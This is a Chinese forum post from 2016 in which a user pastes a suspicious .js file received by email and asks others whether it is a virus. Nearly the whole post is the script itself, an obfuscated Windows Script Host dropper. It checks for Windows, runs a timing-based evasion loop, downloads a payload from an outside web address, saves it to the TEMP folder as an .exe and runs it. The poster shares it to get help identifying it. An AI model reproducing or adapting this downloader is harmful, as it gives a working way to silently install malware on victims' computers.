|
|
我的邮箱收到的一个*.js的文件,同时还有一个VCW.x的文件,担心是病毒,放上来大家看看。
var Njjebnuzmw = false;
var Drajvc = "CreateObject";
var Xjaqx = function Iuxll() {return WScript[Drajvc]("WScript.Shell");}();
var Wguoqb = 123213;
var Lvkavnlx = "MSXML2.XMLHTTP";
var Ujyncrq = 2123213;
var Aetzlpvn = 0;
function Hxwsaenrc(Vjctgfyrm){Xjaqx["Run"](Vjctgfyrm, Aetzlpvn, Aetzlpvn);};
function Yavxqo(){return Lvkavnlx;};
function Npfjsn(Pnqjpfm, Pmqmjhqx){return Pnqjpfm - Pmqmjhqx;};
function Vpwqiwx(){return Drajvc;};
/*@cc_on
@if (@_win32 || @_win64)
Njjebnuzmw = true;
@end
@*/
if (Njjebnuzmw)
{
var Rknmqp = "";
function Btgig(){return 22;};
var Sgfezd = 0; var Lzjfcra = 0;
function Qanam()
{
var Kxuyqazf = new this["Date"]();
var Jzqjwao = Kxuyqazf["getUTCMilliseconds"]();
WScript["Sleep"](Btgig());
var Kxuyqazf = new this["Date"]();
var Ufpguwp = Kxuyqazf["getUTCMilliseconds"]();
WScript["Sleep"](Btgig());
var Kxuyqazf = new this["Date"]();
var Dyvdad = Kxuyqazf["getUTCMilliseconds"]();
var Sgfezd = "Gjtpzoz";
Sgfezd = Npfjsn(Ufpguwp, Jzqjwao);
var Lzjfcra = "Bxmlwd";
Lzjfcra = Npfjsn(Dyvdad, Ufpguwp);
Rknmqp = "open";
return Npfjsn(Sgfezd, Lzjfcra);
}
var Ixkwaxcqiv = false;
var Apygzghdxr = false;
for (var Cqwwsl = Aetzlpvn; Cqwwsl < Btgig() * 1; Cqwwsl++){if (Qanam() != Aetzlpvn){
Ixkwaxcqiv = true;
Lzjfcra = "31" + 11 * Sgfezd + Lzjfcra;
Apygzghdxr = true;
break;
}}
function Qkrgq() {return ((Ixkwaxcqiv == true) && (Ixkwaxcqiv == Apygzghdxr)) ? 1 : Aetzlpvn;};
if (Ixkwaxcqiv && Qkrgq() && Apygzghdxr){
function Nneeuvrwkd() {return Xjaqx["ExpandEnvironmentStrings"]("%TEMP%/") + "xx87Vzpdlz80Dn.exe";};
Zjrxmcvrq = Yavxqo();
Iqvjsptncx = WScript[Drajvc](Zjrxmcvrq);
var Gchpvr = 1;
while (Gchpvr){
try {
Iqvjsptncx[Rknmqp]("GET", "http://yorkshirecyclecompany.com/di8ols", false);
Iqvjsptncx["send"]();
Rruryo = "Sleep";
do {WScript[Rruryo](Btgig() * 11)} while (Iqvjsptncx["readystate"] < 2 * 2);
Gchpvr = Aetzlpvn;
} catch(Sinxxid){};
}
function Ofjhjo(Ekpgoo) {var Ihcbuu = (1, 2, 3, 4, 5, Ekpgoo); return Ihcbuu;};
Sezqmummew = WScript[Vpwqiwx()]("ADODB.Stream");
Zjrxmcvrq = Sezqmummew;
Zjrxmcvrq[Rknmqp]();
Zjrxmcvrq["type"] = Ofjhjo(1);
Zjrxmcvrq["write"](Iqvjsptncx["ResponseBody"]);
Sezqmummew["position"] = Ofjhjo(Aetzlpvn);
Zjrxmcvrq["Save" + "ToFile"](Nneeuvrwkd(), 2);
Sezqmummew["c"+"lose"]();
Metytqs = Nneeuvrwkd();
Hxwsaenrc(Metytqs);
}
} |
阿莫论坛20周年了!感谢大家的支持与爱护!!
阿莫论坛才是最爱国的,关心国家的经济、社会的发展、担心国家被别国牵连卷入战争、知道珍惜来之不易的和平发展,知道师夷之长,关注世界的先进文化与技术,也探讨中国文化的博大精深,也懂得警惕民粹主义的祸国殃民等等等等,无不是爱国忧民的表现。(坛友:tianxian)
|
发表于 2016-3-29 22:09:04
